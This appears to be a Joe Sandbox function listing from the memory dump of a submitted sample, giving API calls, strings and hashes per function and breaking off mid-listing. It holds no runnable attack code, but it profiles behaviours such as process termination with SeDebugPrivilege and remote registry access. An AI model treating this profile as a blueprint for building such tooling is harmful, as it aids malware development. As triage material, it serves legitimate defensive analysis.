API String ID: 2014098862-0
Opcode ID: 6436cec2bd255ae4df252e385b8f9867b52962ef66b840c015bf0c2343b4ccb8
Instruction ID: ef6b6f006b4c18986f6f9b919df1bbd9a3c7e20a5941a428d5db47d9f314d3ba
Opcode Fuzzy Hash: 6436cec2bd255ae4df252e385b8f9867b52962ef66b840c015bf0c2343b4ccb8
Instruction Fuzzy Hash: 2F11CEB1910619BEF6206B719C89F6A3E2DEB4C794F100415F284AB094C9FB6C109BB4

Function 00FE8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FE853C,00000B00,?,?), ref: 00FE892A
HeapAlloc.KERNEL32(00000000,?,00FE853C,00000B00,?,?), ref: 00FE8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FE853C,00000B00,?,?), ref: 00FE8946
GetCurrentProcess.KERNEL32(?,00000000,?,00FE853C,00000B00,?,?), ref: 00FE894E
DuplicateHandle.KERNEL32(00000000,?,00FE853C,00000B00,?,?), ref: 00FE8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FE853C,00000B00,?,?), ref: 00FE8961
GetCurrentProcess.KERNEL32(00FE853C,00000000,?,00FE853C,00000B00,?,?), ref: 00FE8969
DuplicateHandle.KERNEL32(00000000,?,00FE853C,00000B00,?,?), ref: 00FE896C
CreateThread.KERNEL32(00000000,00000000,00FE8992,00000000,00000000,00000000), ref: 00FE8986

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: f907407e026a4828e20c81e0e371839576cf1d0ac11d3ff01cb81b92f66753d9
Instruction ID: 35d6019cf8931cd33af8e5ee0fe6ec9c8434b46f3ac705318cdc729b70c66ca8
Opcode Fuzzy Hash: f907407e026a4828e20c81e0e371839576cf1d0ac11d3ff01cb81b92f66753d9
Instruction Fuzzy Hash: 6201CDB5640349BFE720AFA5DC4DF6B3BACEB89711F408411FA49DB195CAB99C04CB21

Function 01009B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 01009B7B
NULL Pointer assignment, xrefs: 01009BA4, 01009EC8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 40555dec824a439bdf03ead2cfa0ff9ae5d636d848b10fdf6badd62911e2613c
Instruction ID: a2ab2808657255ebd37995496ede836653ebdd1d66280b98972cbb9693111a09
Opcode Fuzzy Hash: 40555dec824a439bdf03ead2cfa0ff9ae5d636d848b10fdf6badd62911e2613c
Instruction Fuzzy Hash: A4C1C471A0024A9FEF11DF99C884EAEB7F5FF48318F148469E949AB2C2E7709D45CB50

Function 01009113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01009167
VariantInit.OLEAUT32(?), ref: 01009238
VariantInit.OLEAUT32(?), ref: 01009339
VariantClear.OLEAUT32(?), ref: 01009343
VariantClear.OLEAUT32(?), ref: 010093A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 010091C8, 010092F6, 010093AE
Incorrect Object type in FOR..IN loop, xrefs: 0100931C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 096185129c36b5153116d34c1a901c22d4e34ba776060a25e66876d88ea84eef
Instruction ID: c099ea3b65f3d584a2180db3aaf52992452a9a26ae28162dfc8e020355b10c82
Opcode Fuzzy Hash: 096185129c36b5153116d34c1a901c22d4e34ba776060a25e66876d88ea84eef
Instruction Fuzzy Hash: 27918071A00209ABEF25DFA5CC48FAEBBB8EF45714F008559F559AB2C2D7749904CFA0

Function 0100975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00FE710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?,?,00FE7455), ref: 00FE7127
Part of subcall function 00FE710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE7142
Part of subcall function 00FE710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE7150
Part of subcall function 00FE710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?), ref: 00FE7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01009806
_memset.LIBCMT ref: 01009813
_memset.LIBCMT ref: 01009956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01009982
CoTaskMemFree.OLE32(?), ref: 0100998D

Strings

NULL Pointer assignment, xrefs: 010099DB

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 61ca4b6651e3311ac2abba26b85ccf55f16a6272d447135629a45051f7634faa
Instruction ID: d50fe49b6e3324d70a846fa1f2de499dbdc303eb1a274d251e129e9159944a64
Opcode Fuzzy Hash: 61ca4b6651e3311ac2abba26b85ccf55f16a6272d447135629a45051f7634faa
Instruction Fuzzy Hash: 20915871D00229EBEF11DFA5CC80EDEBBB9AF48714F10415AF519A7281DB359A44CFA0

Function 01016D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01016E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 01016E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01016E52
_wcscat.LIBCMT ref: 01016EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 01016EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 01016EF2

Strings

SysListView32, xrefs: 01016DF6

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 75ff2b9ae5f5ddb5057b935213862d8ac4f38289330b75b6f7b63aa20105dd61
Instruction ID: 5756eb636efcea2668ecf81c436be09629cd6dc1eca52f1516aba450419561f0
Opcode Fuzzy Hash: 75ff2b9ae5f5ddb5057b935213862d8ac4f38289330b75b6f7b63aa20105dd61
Instruction Fuzzy Hash: FB419371900349EBEB21DFA8CC85BEE77E8EF08354F10456AF584E7191D6BA99848B60

Function 0100E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00FF3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00FF3C7A
Part of subcall function 00FF3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00FF3C88
Part of subcall function 00FF3C55: CloseHandle.KERNEL32(00000000), ref: 00FF3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0100E9A4
GetLastError.KERNEL32 ref: 0100E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0100E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0100EA63
GetLastError.KERNEL32(00000000), ref: 0100EA6E
CloseHandle.KERNEL32(00000000), ref: 0100EAA3

Strings

SeDebugPrivilege, xrefs: 0100E9C2

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e011bc16592c836cf33c4158f5374363bce879e8de23f833eaa4c318b8af94f0
Instruction ID: ef5ddf3cbd17eeafee8c4c3e0f0ce56dc5ae6fd738f2a907d51bca5546e73a31
Opcode Fuzzy Hash: e011bc16592c836cf33c4158f5374363bce879e8de23f833eaa4c318b8af94f0
Instruction Fuzzy Hash: F941AE712042019FEB16EF18CC95F6DB7E5AF46314F08845CF9869B2C2DBB9A848DB91

Function 00FF2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00FF3033

Strings

blank, xrefs: 00FF2FB5
stop, xrefs: 00FF3004
question, xrefs: 00FF2FEC
info, xrefs: 00FF2FD4
warning, xrefs: 00FF301C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 94ba52262acba7fe67e002c61a6634095f7043d9e502d317dbc3a039c0980627
Instruction ID: 11056c4606dd8723e5feb171da16502ef2861c18ba07515f1de63a8bae576e3e
Opcode Fuzzy Hash: 94ba52262acba7fe67e002c61a6634095f7043d9e502d317dbc3a039c0980627
Instruction Fuzzy Hash: CF112B3274838ABFE7149A56DC82DBB779C9F15734B20402BFB00A6181EF759F407AA0

Function 00FF42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FF4312
LoadStringW.USER32(00000000), ref: 00FF4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FF432F
LoadStringW.USER32(00000000), ref: 00FF4336
_wprintf.LIBCMT ref: 00FF435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00FF4357

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 273cdb50fc18a0803616099f66e336b52fd1684d5618d8d2cb53e78c28796361
Instruction ID: bd596955182e02619630194ee104f543981d65dce482e393a938caca843fbdb2
Opcode Fuzzy Hash: 273cdb50fc18a0803616099f66e336b52fd1684d5618d8d2cb53e78c28796361
Instruction Fuzzy Hash: 1B018FF2900209BFE721E6A0DD89EF7776CEB08300F000591BB89E2005EA395E884B70

Function 0101D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

GetSystemMetrics.USER32(0000000F), ref: 0101D47C
GetSystemMetrics.USER32(0000000F), ref: 0101D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0101D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0101D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0101D716
ShowWindow.USER32(00000003,00000000), ref: 0101D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0101D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0101D77D

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: fdbdf9db48632923314304cce56b864c472161315845772d7642c7e03e0c7942
Instruction ID: 5c59fc2e31f9c424c90941e655d58d770fcf15af6480549b44bd648f8cc1239d
Opcode Fuzzy Hash: fdbdf9db48632923314304cce56b864c472161315845772d7642c7e03e0c7942
Instruction Fuzzy Hash: 62B18B71600215ABDF14CFACC9897AD7BF1BF08701F0481A9ED889F299E739A950CB50

Function 0100FD11 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 01010E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0100FDEE

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: eec77fad1f3ea4281ad39756d7e4de719b986f185530365f8993e54b5e5dc97f
Instruction ID: 56024c15f186599a2a87067c45e74ea60ce2941957badd3f88e98def06720ebd
Opcode Fuzzy Hash: eec77fad1f3ea4281ad39756d7e4de719b986f185530365f8993e54b5e5dc97f
Instruction Fuzzy Hash: A3A180712043029FEB21EF18C885B6EBBE5BF85314F04841DF9958B292DB79E949DF42

Function 00F92A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FCC1C7,00000004,00000000,00000000,00000000), ref: 00F92ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FCC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00F92B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FCC1C7,00000004,00000000,00000000,00000000), ref: 00FCC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FCC1C7,00000004,00000000,00000000,00000000), ref: 00FCC286

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 73fb638d7267bff63ce67d1a6423deeb450393ece44def85d210a3383934a2d2
Instruction ID: d2e28138dfa921bcaaa75e9fceefe965b710008777a41aff434e60aea7492281
Opcode Fuzzy Hash: 73fb638d7267bff63ce67d1a6423deeb450393ece44def85d210a3383934a2d2
Instruction Fuzzy Hash: 1B411D33A08781BAEFB69B39CD8CB7B7B91BB95320F14880DE08786551C67DA845F750

Function 00FF70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00FF70DD

Part of subcall function 00FB0DB6: std::exception::exception.LIBCMT ref: 00FB0DEC
Part of subcall function 00FB0DB6: __CxxThrowException@8.LIBCMT ref: 00FB0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FF7114
EnterCriticalSection.KERNEL32(?), ref: 00FF7130
_memmove.LIBCMT ref: 00FF717E
_memmove.LIBCMT ref: 00FF719B
LeaveCriticalSection.KERNEL32(?), ref: 00FF71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FF71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF71DE

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 54bd01e3a9cb6d6dfe196ac27b43096d6ddf6240e4583f06e465ec289ec462c6
Instruction ID: e00ccbf0142e8e3a9415e611391bbd8002879e9db31d5048c73617a951b7457c
Opcode Fuzzy Hash: 54bd01e3a9cb6d6dfe196ac27b43096d6ddf6240e4583f06e465ec289ec462c6
Instruction Fuzzy Hash: 1A319E75A00206EBCB10EFA5DC85AAFB778EF45310F1441A5ED04AB246DB38DE14DBA0

Function 010161D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 010161EB
GetDC.USER32(00000000), ref: 010161F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 010161FE
ReleaseDC.USER32(00000000,00000000), ref: 0101620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01016246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01016257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0101902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01016291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010162B1

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: eb9751c2f4253fbbfad0d709f3b0e580727cad5e0ba4a1d9ce4816b0780bf327
Instruction ID: a8c9333400050936b92ca299d5e1ba9b93b6bc77fd80475157dd427bde463178
Opcode Fuzzy Hash: eb9751c2f4253fbbfad0d709f3b0e580727cad5e0ba4a1d9ce4816b0780bf327
Instruction Fuzzy Hash: FA319F721006107FEF218F64CC8AFEA3FA9EF4A765F040055FE889A185C6BA9845CB60

Function 00FEBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00FEBBC4
_memcmp.LIBCMT ref: 00FEBBE6
_memcmp.LIBCMT ref: 00FEBBFE
_memcmp.LIBCMT ref: 00FEBC11
_memcmp.LIBCMT ref: 00FEBC2B
_memcmp.LIBCMT ref: 00FEBC3E
_memcmp.LIBCMT ref: 00FEBC56
_memcmp.LIBCMT ref: 00FEBC71

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d13c9616e8cd81f9ad7c00a3ca51960dace292df2784d1f3da8dcf75ace5f46a
Instruction ID: 2437a8281e21898e86f94a3130399be4cc56ce47be441895cb87ef9ba08b3a0d
Opcode Fuzzy Hash: d13c9616e8cd81f9ad7c00a3ca51960dace292df2784d1f3da8dcf75ace5f46a
Instruction Fuzzy Hash: A1215772B0425ABBE208B617DD52FFB735CAE51358F584424FD049B603EB28DE10F6A1

Function 00FFEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

Part of subcall function 00FAFC86: _wcscpy.LIBCMT ref: 00FAFCA9

_wcstok.LIBCMT ref: 00FFEC94
_wcscpy.LIBCMT ref: 00FFED23
_memset.LIBCMT ref: 00FFED56

Strings

X, xrefs: 00FFED93

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 3571b552c5a6a8f8dba4cf0a1cd710b2e6ebc9a3b3a776a9ac926e866a022341
Instruction ID: 22afac95ee921ae4ec2404caa8198fbbd68cfb2d9c86f7caeb8053e1f9ab6664
Opcode Fuzzy Hash: 3571b552c5a6a8f8dba4cf0a1cd710b2e6ebc9a3b3a776a9ac926e866a022341
Instruction Fuzzy Hash: 04C1A0716083459FDB54EF24C881A6AB7E4FF85320F00492DF9999B2B2DB74ED05EB42

Function 01006B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01006C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01006C21
WSAGetLastError.WSOCK32(00000000), ref: 01006C34
